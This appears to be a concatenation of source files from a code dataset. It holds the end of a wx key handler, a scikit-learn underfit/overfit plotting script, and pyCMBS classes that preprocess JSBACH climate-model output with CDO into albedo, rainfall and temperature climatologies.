if event.GetKeyCode() == wx.WXK_ESCAPE:
self.Close()
event.Skip()
| kvark128/yandexTranslate | globalPlugins/yandexTranslate/helper.py | Python | mit | 1,890 |
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
np.random.seed(0)
n_samples = 30
degrees = [1, 4, 15]
true_fun = lambda X: np.cos(1.5 * np.pi * X)
X = np.sort(np.random.rand(n_samples))
y = true_fun(X) + np.random.randn(n_samples) * 0.1
plot_titles = ['Underfit', 'Just right', 'Overfit']
plt.figure(figsize=(14, 5))
for i in range(len(degrees)):
ax = plt.subplot(1, len(degrees), i + 1)
plt.setp(ax, xticks=(), yticks=())
polynomial_features = PolynomialFeatures(degree=degrees[i],
include_bias=False)
linear_regression = LinearRegression()
pipeline = Pipeline([("polynomial_features", polynomial_features),
("linear_regression", linear_regression)])
pipeline.fit(X[:, np.newaxis], y)
    # Evaluate the models using cross-validation
scores = cross_val_score(pipeline, X[:, np.newaxis], y,
scoring="neg_mean_squared_error", cv=10)
X_test = np.linspace(0, 1, 100)
plt.plot(X_test, pipeline.predict(X_test[:, np.newaxis]), label="Model")
#plt.plot(X_test, true_fun(X_test), label="True function")
plt.scatter(X, y, c='k', label="Samples")
plt.xlabel("x with degree: {}".format(degrees[i]))
plt.ylabel("y")
plt.xlim((0, 1))
plt.ylim((-2, 2))
plt.legend(loc="best")
plt.title(plot_titles[i])
#plt.show()
plt.savefig('images/overfit_underfit.png')
| bhzunami/Immo | immo/scikit/scripts/Overfit_underfit.py | Python | mit | 1,611 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
class JSBACH_BOT(Model):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, **kwargs):
super(JSBACH_BOT, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_BOT'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
get albedo data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
filename = self.data_dir + 'data/model1/' + self.experiment + '_echam6_BOT_mm_1979-2006_albedo_yseasmean.nc'
ls_mask = get_T63_landseamask(self.shift_lon)
albedo = Data(filename, v, read=True,
label='MPI-ESM albedo ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return albedo
def get_tree_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_forest_shrub.nc'
v = 'var12'
tree = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')))
return tree
def get_grass_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_grass_crop_pasture_2001.nc'
v = 'var12'
grass = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')), squeeze=True)
return grass
def get_surface_shortwave_radiation_down(self, interval='season'):
"""
get surface shortwave incoming radiation data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
y1 = '1979-01-01'
y2 = '2006-12-31'
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_echam6_BOT_mm_1979-2006_srads.nc'
if not os.path.exists(rawfilename):
return None
#--- read data
cdo = pyCDO(rawfilename, y1, y2)
if interval == 'season':
seasfile = cdo.seasmean()
del cdo
print 'seasfile: ', seasfile
cdo = pyCDO(seasfile, y1, y2)
filename = cdo.yseasmean()
else:
raise ValueError('Invalid interval option %s ' % interval)
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SIS data
sis = Data(filename, v, read=True,
label='MPI-ESM SIS ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data)
return sis
def get_rainfall_data(self, interval='season'):
"""
get rainfall data for JSBACH
returns Data object
"""
if interval == 'season':
pass
else:
raise ValueError('Invalid value for interval: %s' % interval)
#/// PREPROCESSING: seasonal means ///
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
filename1 = self.data_dir + self.experiment + '_echam6_BOT_mm_1980_sel.nc'
tmp = pyCDO(filename1, s_start_time, s_stop_time).seldate()
tmp1 = pyCDO(tmp, s_start_time, s_stop_time).seasmean()
filename = pyCDO(tmp1, s_start_time, s_stop_time).yseasmean()
#/// READ DATA ///
#1) land / sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#2) precipitation data
try:
v = 'var4'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
except:
v = 'var142'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return rain
class JSBACH_RAW2(Model):
"""
Class for RAW JSBACH model output
works on the real raw output
"""
#def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
"""
The assignment of certain variables to different input streams is done in the routine
get_jsbach_data_generic()
Parameters
----------
input_format : str
specifies file format of input data
['nc','grb']
"""
super(JSBACH_RAW2, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
#self.get_data()
self.type = 'JSBACH_RAW2'
self.input_format = input_format
assert self.input_format in ['nc', 'grb']
self.raw_outdata = raw_outdata
self._unique_name = self._get_unique_name()
# do preprocessing of streams (only needed once!) ---
self.files = {}
self._preproc_streams()
#~ self.model_dict = copy.deepcopy(model_dict)
self.model = 'JSBACH'
def _get_filenames_jsbach_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_main_mm_*.' + self.input_format
def _get_filenames_veg_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_veg_mm_*.' + self.input_format
def _get_filenames_land_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_land_mm_*.' + self.input_format
def _get_filenames_surf_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_surf_mm_*.' + self.input_format
def _get_filenames_albedo_VIS(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_VIS_albedo.' + self.input_format
def _get_filenames_albedo_NIR(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_NIR_albedo.' + self.input_format
def _get_filenames_echam_BOT(self):
return self.data_dir + self.raw_outdata + '../echam6/' + self.experiment + '_echam6_BOT_mm_*.sz'
def _preproc_streams(self):
"""
It is assumed that the standard JSBACH postprocessing scripts have been applied.
Thus monthly mean data is available for each stream and code tables still need to be applied.
This routine does the following:
1) merge all times from individual (monthly mean) output files
2) assign codetables to work with proper variable names
3) aggregate data from tiles to gridbox values
"""
print 'Preprocessing JSBACH raw data streams (may take a while) ...'
cdo = Cdo()
# jsbach stream
print ' JSBACH stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_', dir=get_temporary_directory()) # temporary file
#~ print self.data_dir
#~ print self.raw_outdata
#~ print 'Files: ', self._get_filenames_jsbach_stream()
#~ stop
if len(glob.glob(self._get_filenames_jsbach_stream())) > 0: # check if input files existing at all
                print 'Merging the following files:', self._get_filenames_jsbach_stream()
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_jsbach_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
print 'Outfile: ', outfile
#~ os.remove(tmp)
print 'Temporary name: ', tmp
self.files.update({'jsbach': outfile})
# veg stream
print ' VEG stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_veg_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_veg.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_veg_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_veg_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_veg_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'veg': outfile})
# veg land
print ' LAND stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_land_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_land.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_land_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_land_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_land_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'land': outfile})
# surf stream
print ' SURF stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_surf_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_surf.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_surf_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_surf_stream())) > 0: # check if input files existing at all
print glob.glob(self._get_filenames_surf_stream())
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_surf_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'surf': outfile})
# ECHAM BOT stream
print ' BOT stream ...'
outfile = get_temporary_directory() + self.experiment + '_echam6_echam_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_echam6_echam.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_echam6_echam_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_echam_BOT())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_echam_BOT())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'echam': outfile})
# ALBEDO file
# albedo files as preprocessed by a script of Thomas
print ' ALBEDO VIS stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_VIS_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_VIS())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_VIS())
self.files.update({'albedo_vis': outfile})
print ' ALBEDO NIR stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_NIR_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_NIR())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_NIR())
self.files.update({'albedo_nir': outfile})
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
        Calculate the albedo as the ratio of upward and downwelling shortwave fluxes.
        The monthly mean fluxes are used to calculate the albedo.
        This routine relies on the accessor routines defined for reading the
        upward and downward fluxes.
"""
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#~ tmpdict = copy.deepcopy(kwargs)
#~ print self.dic_vars
routine_up = self.dic_vars['surface_upward_flux']
routine_down = self.dic_vars['sis']
#sw_down = self.get_surface_shortwave_radiation_down(interval=interval, **kwargs)
cmd = 'sw_down = self.' + routine_down
exec(cmd)
#sw_up = self.get_surface_shortwave_radiation_up(interval=interval, **kwargs)
cmd = 'sw_up = self.' + routine_up
exec(cmd)
# climatological mean
alb = sw_up[0].div(sw_down[0])
alb.label = self.experiment + ' albedo'
alb.unit = '-'
# original data
alb_org = sw_up[1][2].div(sw_down[1][2])
alb_org.label = self.experiment + ' albedo'
alb_org.unit = '-'
retval = (alb_org.time, alb_org.fldmean(), alb_org)
return alb, retval
def get_albedo_data_vis(self, interval='season', **kwargs):
"""
        This routine retrieves the JSBACH albedo information for VIS.
        It requires preprocessing with a script that aggregates from tile
        to gridbox values.
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_vis'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_albedo_data_nir(self, interval='season', **kwargs):
"""
        This routine retrieves the JSBACH albedo information for NIR.
        It requires preprocessing with a script that aggregates from tile
        to gridbox values.
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_nir'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_temperature_2m(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_jsbach_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
        kwargs is a dictionary with one key per model type; its value is a dictionary with the properties for that model
"""
if not self.type in kwargs.keys():
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
return None
print self.type
print kwargs
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
        # no defaults; everything should be explicitly specified in either the config file or the dictionaries
varname = locdict.pop('variable')
units = locdict.pop('unit', 'Unit not specified')
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
#model_suffix = locdict.pop('model_suffix')
#model_prefix = locdict.pop('model_prefix')
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if self.type != 'JSBACH_RAW2':
print self.type
raise ValueError('Invalid data format here!')
# define from which stream of JSBACH data needs to be taken for specific variables
if varname in ['swdown_acc', 'swdown_reflect_acc']:
filename1 = self.files['jsbach']
elif varname in ['precip_acc']:
filename1 = self.files['land']
elif varname in ['temp2']:
filename1 = self.files['echam']
elif varname in ['var14']: # albedo vis
filename1 = self.files['albedo_vis']
elif varname in ['var15']: # albedo NIR
filename1 = self.files['albedo_nir']
else:
print varname
raise ValueError('Unknown variable type for JSBACH_RAW2 processing!')
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
            print 'WARNING: File does not exist: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing! ')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
        # ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
class JSBACH_SPECIAL(JSBACH_RAW2):
"""
special class for more flexible reading of JSBACH input data
it allows to specify the input format and the directory of the input data
in case that you use a different setup, it is probably easiest to
just copy this class and make the required adaptations.
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='nc', raw_outdata='', **kwargs):
super(JSBACH_SPECIAL, self).__init__(filename, dic_variables, experiment, name=name, shift_lon=shift_lon, model_dict=model_dict, input_format=input_format, raw_outdata=raw_outdata, **kwargs)
class xxxxxxxxJSBACH_RAW(Model):
"""
Class for RAW JSBACH model output
works on manually preprocessed already concatenated data
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, intervals='monthly', **kwargs):
super(JSBACH_RAW, self).__init__(filename, dic_variables, name=name, intervals=intervals, **kwargs)
        print('WARNING: This model class should be deprecated as it contains a lot of hardcoded dependencies and is only intermediate')
        # TODO: deprecate this class
stop
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_RAW'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_temperature_2m(self, interval='monthly', **kwargs):
"""
get surface temperature (2m) from JSBACH model results
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'temp2'
rawfile = self.data_dir + self.experiment + '_echam6_echam_' + variable + '_ALL.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
def get_albedo_data(self, interval='monthly', **kwargs):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
"""
# read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon) # TODO make this more flexible
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
Fd = self.get_surface_shortwave_radiation_down(**kwargs)
Fu = self.get_surface_shortwave_radiation_up(**kwargs)
if Fu is None:
            print 'File does not exist for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
if Fu_i is None:
return None
if Fd is None:
            print 'File does not exist for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
if Fd_i is None:
return None
lab = Fu_i.label
        # albedo for the chosen interval is calculated as the ratio of the mean fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
Fu_i._apply_mask(ls_mask.data)
        # albedo for monthly data (needed for global mean plots)
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
#-----------------------------------------------------------------------
def _do_preprocessing(self, rawfile, varname, s_start_time, s_stop_time, interval='monthly', force_calc=False, valid_mask='global', target_grid='t63grid'):
"""
perform preprocessing
* selection of variable
* temporal subsetting
"""
cdo = Cdo()
if not os.path.exists(rawfile):
            print('File does not exist! %s ' % rawfile)
return None, None
# calculate monthly means
file_monthly = get_temporary_directory() + os.sep + os.path.basename(rawfile[:-3]) + '_' + varname + '_' + s_start_time + '_' + s_stop_time + '_mm.nc'
if (force_calc) or (not os.path.exists(file_monthly)):
cdo.monmean(options='-f nc', output=file_monthly, input='-seldate,' + s_start_time + ',' + s_stop_time + ' ' + '-selvar,' + varname + ' ' + rawfile, force=force_calc)
else:
pass
if not os.path.exists(file_monthly):
raise ValueError('Monthly preprocessing did not work! %s ' % file_monthly)
# calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
            return None, None
# read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.name, shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.name + ' std', unit='-', shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.name + ' std', shift_lon=False, lat_name='lat', lon_name='lon')
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.name, shift_lon=False, time_cycle=12, lat_name='lat', lon_name='lon')
mdata_all.adjust_time(day=15)
        # mask_antarctica masks everything below 60 degrees S.
        # here we only mask Antarctica if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
"""
get surface shortwave incoming radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
